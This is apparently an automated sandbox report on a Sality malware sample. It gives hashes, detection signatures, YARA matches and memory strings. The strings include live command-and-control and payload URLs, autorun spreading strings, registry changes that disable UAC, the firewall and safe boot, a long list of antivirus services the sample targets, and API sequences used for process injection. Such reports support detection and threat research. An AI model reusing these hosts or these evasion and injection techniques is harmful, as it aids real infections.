Create Interactive Tour

Windows Analysis Report
lzxbD4wR0g.exe

Overview

General Information

Sample Name:lzxbD4wR0g.exe
Analysis ID:724697
MD5:c890f96e19ee27909df744b788477006
SHA1:3561aaad032a7a8697763f05247b4ae80c2aaf56
SHA256:2d0e058a8b228d5218137814147c05674d5c5ad8d0614f80cd088dba156204e2
Infos:

Detection

Sality
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected Sality
Antivirus detection for dropped file
Writes to foreign memory regions
PE file has a writeable .text section
Deletes keys which are related to windows safe boot (disables safe mode boot)
Disables user account control notifications
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
Allocates memory in foreign processes
May modify the system service descriptor table (often done to hook functions)
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to inject threads in other processes
Disables UAC (registry)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
May infect USB drives
Detected potential crypto function
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Modifies existing windows services
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • lzxbD4wR0g.exe (PID: 1248 cmdline: C:\Users\user\Desktop\lzxbD4wR0g.exe MD5: C890F96E19EE27909DF744B788477006)
    • explorer.exe (PID: 1244 cmdline: explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
    • fontdrvhost.exe (PID: 684 cmdline: fontdrvhost.exe MD5: 31113981180E69C2773BCADA4051738A)
    • WerFault.exe (PID: 1348 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 832 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: lzxbD4wR0g.exe PID: 1248JoeSecurity_SalityYara detected SalityJoe Security
    SourceRuleDescriptionAuthorStrings
    0.2.lzxbD4wR0g.exe.21d0d88.6.unpackJoeSecurity_SalityYara detected SalityJoe Security
      0.2.lzxbD4wR0g.exe.21d0d88.6.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
      • 0x31798:$s1: Simple Poly Engine v
      0.2.lzxbD4wR0g.exe.21e0000.9.unpackJoeSecurity_SalityYara detected SalityJoe Security
        0.2.lzxbD4wR0g.exe.21e0000.9.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
        • 0x22520:$s1: Simple Poly Engine v
        0.2.lzxbD4wR0g.exe.2200cc4.10.raw.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
        • 0x185c:$s1: Simple Poly Engine v
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: lzxbD4wR0g.exeVirustotal: Detection: 77%Perma Link
        Source: lzxbD4wR0g.exeReversingLabs: Detection: 100%
        Source: lzxbD4wR0g.exeAvira: detected
        Source: http://kukutrustnet987.info/home.gifAvira URL Cloud: Label: malware
        Source: http://www.klkjwre9fqwieluoi.info/Avira URL Cloud: Label: malware
        Source: http://kukutrustnet777888.info/Avira URL Cloud: Label: malware
        Source: http://kukutrustnet888.info/home.gifAvira URL Cloud: Label: malware
        Source: http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdriversAvira URL Cloud: Label: malware
        Source: http://kukutrustnet777.info/home.gifAvira URL Cloud: Label: malware
        Source: http://kukutrustnet777888.info/DisableTaskMgrSoftwareAvira URL Cloud: Label: malware
        Source: http://kukutrustnet987.info/home.gifVirustotal: Detection: 14%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\xnpkup.exeAvira: detection malicious, Label: W32/Sality.AT
        Source: lzxbD4wR0g.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\xnpkup.exeJoe Sandbox ML: detected
        Source: 0.2.lzxbD4wR0g.exe.400000.0.unpackAvira: Label: TR/Injector.2461429
        Source: 0.2.lzxbD4wR0g.exe.2200cc4.10.unpackAvira: Label: TR/Killav.ftk
        Source: 0.2.lzxbD4wR0g.exe.21e0000.9.unpackAvira: Label: TR/Rootkit.Gen2
        Source: 0.2.lzxbD4wR0g.exe.544c50.4.unpackAvira: Label: TR/Patched.Ren.Gen
        Source: 0.2.lzxbD4wR0g.exe.429a02.1.unpackAvira: Label: TR/Patched.Ren.Gen
        Source: 0.0.lzxbD4wR0g.exe.400000.0.unpackAvira: Label: W32/Sality.AT
        Source: lzxbD4wR0g.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: Binary string: -;E:\Git_reponse\mesworker\dist\RealUpdater.pdb source: lzxbD4wR0g.exe
        Source: Binary string: E:\Git_reponse\mesworker\dist\RealUpdater.pdb source: lzxbD4wR0g.exe

        Spreading

        barindex
        Source: Yara matchFile source: 0.2.lzxbD4wR0g.exe.21d0d88.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.lzxbD4wR0g.exe.21e0000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: Process Memory Space: lzxbD4wR0g.exe PID: 1248, type: MEMORYSTR
        Source: lzxbD4wR0g.exeBinary or memory string: autorun.inf
        Source: lzxbD4wR0g.exeBinary or memory string: [AutoRun]
        Source: lzxbD4wR0g.exe, 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: [AutoRun]
        Source: lzxbD4wR0g.exe, 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: autorun.inf
        Source: lzxbD4wR0g.exe, 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: _kkiuynbvnbrev406C:\hh8geqpHJTkdns6MCIDRV_VERMozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)MPRNtQuerySystemInformationSoftware\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache GlobalUserOfflineSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsSoftware\Microsoft\Windows\CurrentVersionhttp://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers\KeServiceDescriptorTable_os%d%dhttp://kukutrustnet777888.info/DisableTaskMgrSoftware\Microsoft\Windows\CurrentVersion\policies\systemEnableLUASoftware\Microsoft\Windows\ShellNoRoam\MUICachemonga_bongapurity_control_7728SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile%s:*:Enabled:ipsecSYSTEM\CurrentControlSet\Services\SharedAccessStart\AuthorizedApplications\ListSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHidden[AutoRun]
        Source: lzxbD4wR0g.exe, 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: shell\explore\Commandshell\Autoplay\commandDisableRegistryToolsDAEMON.Simple Poly Engine v1.1a(c) Sector\SvcSOFTWARE\Microsoft\Security CenterAntiVirusOverrideAntiVirusDisableNotifyFirewallDisableNotifyFirewallOverrideUpdatesDisableNotifyUacDisableNotifyAntiSpywareOverrideSYSTEMkukutrusted!.CreateMutexAKERNEL32TEXTUPXCODEGdiPlus.dllDEVICEMB.loghttp://\Runhttpipfltdrv.syswww.microsoft.com?%x=%d&%x=%dSYSTEM.INIUSER32.DLL.%c%s\\.\amsint32.EXE.SCRSfcIsFileProtectedsfcdrw.VDB.AVCNTDLL.DLLrnd=autorun.infEnableFirewallDoNotAllowExceptionsDisableNotificationsWNetEnumResourceAWNetOpenEnumAWNetCloseEnumADVAPI32.DLLCreateServiceAOpenSCManagerAOpenServiceACloseServiceHandleDeleteServiceControlService__hStartServiceANOTICE__drIPFILTERDRIVERChangeServiceConfigAwin%s.exe%s.exeWININET.DLLInternetOpenAInternetReadFileInternetOpenUrlAInternetCloseHandleAVPAgnitum Client Security ServiceALGAmon monitoraswUpdSvaswMon2aswRdraswSPaswTdiaswFsBlkacssrvAV Engineavast! iAVS4 Control Serviceavast! Antivirusavast! Mail Scanneravast! Web Scanneravast! Asynchronous Virus Monitoravast! Self ProtectionAVG E-mail ScannerAvira AntiVir Premium GuardAvira AntiVir Premium WebGuardAvira AntiVir Premium MailGuardBGLiveSvcBlackICECAISafeccEvtMgrccProxyccSetMgrCOMODO Firewall Pro Sandbox DrivercmdGuardcmdAgentEset ServiceEset HTTP ServerEset Personal FirewallF-Prot Antivirus Update MonitorfsbwsysFSDFWDF-Secure Gatekeeper Handler StarterFSMAGoogle Online ServicesInoRPCInoRTInoTaskISSVCKPF4KLIFLavasoftFirewallLIVESRVMcAfeeFrameworkMcShieldMcTaskManagerMpsSvcnavapsvcNOD32krnNPFMntorNSCServiceOutpost Firewall main moduleOutpostFirewallPAVFIRESPAVFNSVRPavProtPavPrSrvPAVSRVPcCtlComPersonalFirewalPREVSRVProtoPort Firewall servicePSIMSVCRapAppSharedAccessSmcServiceSNDSrvcSPBBCSvcSpIDer FS Monitor for Windows NTSpIDer Guard File System MonitorSPIDERNTSymantec Core LCSymantec Password ValidationSymantec AntiVirus Definition WatcherSavRoamSymantec AntiVirusTmntsrvTmPfwUmxAgentUmxCfgUmxLUUmxPolvsmonVSSERVWebrootDesktopFirewallDataServiceWebrootFirewallwscsvcXCOMMSystem\CurrentControlSet\Control\SafeBoot%d%d.tmpSOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList%s\%s%s\Software\Microsoft\Windows\CurrentVersion\Ext\StatsSoftware\Microsoft\Windows\CurrentVersion\Ext\StatsSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper ObjectsKERNEL32.DLLbootshellSYSTEM.INIExplorer.exeAVPM.A2GUARDA2CMD.A2SERVICE.A2FREEAVASTADVCHK.AGB.AKRNL.AHPROCMONSERVER.AIRDEFENSEALERTSVCAVIRAAMON.TROJAN.AVZ.ANTIVIRAPVXDWIN.ARMOR2NET.ASHAVAST.ASHDISP.ASHENHCD.ASHMAISV.ASHPOPWZ.ASHSERV.ASHSIMPL.ASHSKPCK.ASHWEBSV.ASWUPDSV.ASWSCANAVCIMAN.AVCONSOL.AVENGINE.AVESVC.AVEVAL.AVEVL32.AVGAMAVGCC.AVGCHSVX.AVGCSRVX.AVGNSX.AVGCC32.AVGCTRL.AVGEMC.AVGFWSRV.AVGNT.AVCENTERAVGNTMGRAVGSERV.AVGTRAY.AVGUARD.AVGUPSVC.AVGWDSVC.AVINITNT.AVKSERV.AVKSERVICE.AVKWCTL.AVP.AVP32.AVPCC.AVASTAVSERVER.AVSCHED32.AVSYNMGR.AVWUPD32.AVWUPSRV.AVXMONITORAVXQUAR.BDSWITCH.BLACKD.BLACKICE.CAFIX.BITDEFENDERCCEVTMGR.CFP.CFPCONFIG.CCSETMGR.CFIAUDIT.CLAMTRA
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_0220A2F5 Sleep,GetTempPathA,lstrlen,lstrcat,lstrlen,lstrcpy,lstrcat,FindFirstFileA,FindNextFileA,lstrcat,lstrlen,lstrlen,lstrcmpi,lstrcmpi,Sleep,FindClose,Sleep,RtlExitUserThread,0_2_0220A2F5
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_02211060 Sleep,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,Sleep,lstrlen,lstrcat,lstrlen,lstrlen,lstrcmpi,lstrcmpi,lstrcpy,lstrcat,DeleteFileA,lstrcpy,lstrlen,lstrcmpi,FindClose,Sleep,0_2_02211060
        Source: Joe Sandbox ViewIP Address: 85.85.85.85 85.85.85.85
        Source: global trafficUDP traffic: 192.168.2.5:60842 -> 85.85.85.85:5517
        Source: unknownUDP traffic detected without corresponding DNS query: 85.85.85.85
        Source: lzxbD4wR0g.exe, 00000000.00000002.316911438.00000000021C9000.00000004.00000010.00020000.00000000.sdmp, lzxbD4wR0g.exe, 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmp, lzxbD4wR0g.exe, 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, lzxbD4wR0g.exe, 00000000.00000002.315850733.0000000000603000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://89.11
        Source: lzxbD4wR0g.exe, 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/
        Source: lzxbD4wR0g.exe, 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif
        Source: lzxbD4wR0g.exe, 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777.info/home.gif
        Source: lzxbD4wR0g.exe, lzxbD4wR0g.exe, 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/
        Source: lzxbD4wR0g.exe, 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/DisableTaskMgrSoftware
        Source: lzxbD4wR0g.exe, 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet888.info/home.gif
        Source: lzxbD4wR0g.exe, 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet987.info/home.gif
        Source: lzxbD4wR0g.exe, lzxbD4wR0g.exe, 00000000.00000002.316911438.00000000021C9000.00000004.00000010.00020000.00000000.sdmp, lzxbD4wR0g.exe, 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmp, lzxbD4wR0g.exe, 00000000.00000002.315850733.0000000000603000.00000004.10000000.00040000.00000000.sdmp, lzxbD4wR0g.exe, 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://paaaaad.fd.fd/sobakavolos.gif
        Source: lzxbD4wR0g.exe, lzxbD4wR0g.exe, 00000000.00000002.316911438.00000000021C9000.00000004.00000010.00020000.00000000.sdmp, lzxbD4wR0g.exe, 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmp, lzxbD4wR0g.exe, 00000000.00000002.315850733.0000000000603000.00000004.10000000.00040000.00000000.sdmp, lzxbD4wR0g.exe, 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://padrup.com.ds/sobaka1.gif
        Source: lzxbD4wR0g.exe, 00000000.00000002.316911438.00000000021C9000.00000004.00000010.00020000.00000000.sdmp, lzxbD4wR0g.exe, 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://padrup.com.ds/sobaka1.gifhttp://paaaaad.fd.fd/sobakavolos.gif
        Source: lzxbD4wR0g.exe, 00000000.00000002.316911438.00000000021C9000.00000004.00000010.00020000.00000000.sdmp, lzxbD4wR0g.exe, 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmp, lzxbD4wR0g.exe, 00000000.00000002.315850733.0000000000603000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://padrup.com.ds/sobaka1.gifhttp://paaaaad.fd.fd/sobakavolos.gifs
        Source: lzxbD4wR0g.exe, lzxbD4wR0g.exe, 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.klkjwre9fqwieluoi.info/
        Source: lzxbD4wR0g.exe, 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_02207A3A htons,socket,LdrInitializeThunk,setsockopt,bind,GlobalAlloc,recvfrom,CreateThread,GlobalFree,closesocket,RtlExitUserThread,0_2_02207A3A

        System Summary

        barindex
        Source: 0.2.lzxbD4wR0g.exe.21d0d88.6.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: 0.2.lzxbD4wR0g.exe.21e0000.9.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: 0.2.lzxbD4wR0g.exe.2200cc4.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: lzxbD4wR0g.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: xnpkup.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: lzxbD4wR0g.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 0.2.lzxbD4wR0g.exe.21d0d88.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 0.2.lzxbD4wR0g.exe.21e0000.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 0.2.lzxbD4wR0g.exe.2200cc4.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 832
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeFile deleted: C:\Windows\5b44deJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeFile created: C:\Windows\5b44deJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_0220E3290_2_0220E329
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_0220B6140_2_0220B614
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_02216CD00_2_02216CD0
        Source: lzxbD4wR0g.exeBinary or memory string: OriginalFilenameWdExt.exe vs lzxbD4wR0g.exe
        Source: xnpkup.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: xnpkup.exe.0.drStatic PE information: Section .text
        Source: lzxbD4wR0g.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9915533685064936
        Source: lzxbD4wR0g.exeVirustotal: Detection: 77%
        Source: lzxbD4wR0g.exeReversingLabs: Detection: 100%
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeFile read: C:\Users\user\Desktop\lzxbD4wR0g.exeJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\lzxbD4wR0g.exe C:\Users\user\Desktop\lzxbD4wR0g.exe
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer.exe
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 832
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer.exeJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_02211EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,FindCloseChangeNotification,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpi,lstrcmpi,lstrcmpi,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,FindCloseChangeNotification,CloseHandle,GetProcessHeap,HeapFree,0_2_02211EF6
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeFile created: C:\Users\user\AppData\Local\Temp\xnpkup.exeJump to behavior
        Source: classification engineClassification label: mal100.spre.evad.winEXE@5/2@0/1
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeFile read: C:\Windows\system.iniJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_02212514 CreateToolhelp32Snapshot,Process32First,lstrlen,lstrcpyn,lstrcpy,CharLowerA,lstrlen,wsprintfA,CreateMutexA,GetLastError,ReleaseMutex,CloseHandle,Process32Next,lstrlen,lstrcpyn,lstrcpy,CharLowerA,lstrlen,wsprintfA,CreateMutexA,GetLastError,ReleaseMutex,FindCloseChangeNotification,CloseHandle,0_2_02212514
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeMutant created: \Sessions\1\BaseNamedObjects\wininit.exeM_464_
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeMutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_476_
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeMutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_392_
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeMutant created: \Sessions\1\BaseNamedObjects\winlogon.exeM_556_
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeMutant created: \Sessions\1\BaseNamedObjects\uxJLpe1m
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeMutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_684_
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeMutant created: \Sessions\1\BaseNamedObjects\services.exeM_564_
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeMutant created: \Sessions\1\BaseNamedObjects\registryM_88_
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeMutant created: \Sessions\1\BaseNamedObjects\smss.exeM_296_
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeMutant created: \Sessions\1\BaseNamedObjects\lsass.exeM_600_
        Source: lzxbD4wR0g.exeString found in binary or memory: F-STOPW.
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeFile written: C:\Windows\system.iniJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeProcess created: C:\Windows\SysWOW64\explorer.exe
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
        Source: lzxbD4wR0g.exeStatic file information: File size 2111255 > 1048576
        Source: Binary string: -;E:\Git_reponse\mesworker\dist\RealUpdater.pdb source: lzxbD4wR0g.exe
        Source: Binary string: E:\Git_reponse\mesworker\dist\RealUpdater.pdb source: lzxbD4wR0g.exe
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_00401650 push eax; ret 0_2_0040167E
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_0043612C push esi; ret 0_2_0043612D
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_0042543A push ebx; retf 0_2_0042544A
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_02218060 push eax; ret 0_2_0221808E
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_02209EEA Sleep,Sleep,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateThread,LoadLibraryA,GetProcAddress,CreateThread,RtlExitUserThread,0_2_02209EEA
        Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.990480623641147
        Source: initial sampleStatic PE information: section name: .text entropy: 7.986794508081656
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeFile created: C:\Users\user\AppData\Local\Temp\xnpkup.exeJump to dropped file
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: lzxbD4wR0g.exeBinary or memory string: KeServiceDescriptorTable
        Source: lzxbD4wR0g.exe, 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: KeServiceDescriptorTable
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exe TID: 4228Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exe TID: 5984Thread sleep time: -67951s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exe TID: 6024Thread sleep time: -300000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exe TID: 4736Thread sleep time: -180000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeThread delayed: delay time: 180000Jump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_0220A2F5 Sleep,GetTempPathA,lstrlen,lstrcat,lstrlen,lstrcpy,lstrcat,FindFirstFileA,FindNextFileA,lstrcat,lstrlen,lstrlen,lstrcmpi,lstrcmpi,Sleep,FindClose,Sleep,RtlExitUserThread,0_2_0220A2F5
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_02211060 Sleep,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,Sleep,lstrlen,lstrcat,lstrlen,lstrlen,lstrcmpi,lstrcmpi,lstrcpy,lstrcat,DeleteFileA,lstrcpy,lstrlen,lstrcmpi,FindClose,Sleep,0_2_02211060
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeThread delayed: delay time: 120000Jump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeThread delayed: delay time: 67951Jump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeThread delayed: delay time: 180000Jump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_02209EEA Sleep,Sleep,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateThread,LoadLibraryA,GetProcAddress,CreateThread,RtlExitUserThread,0_2_02209EEA
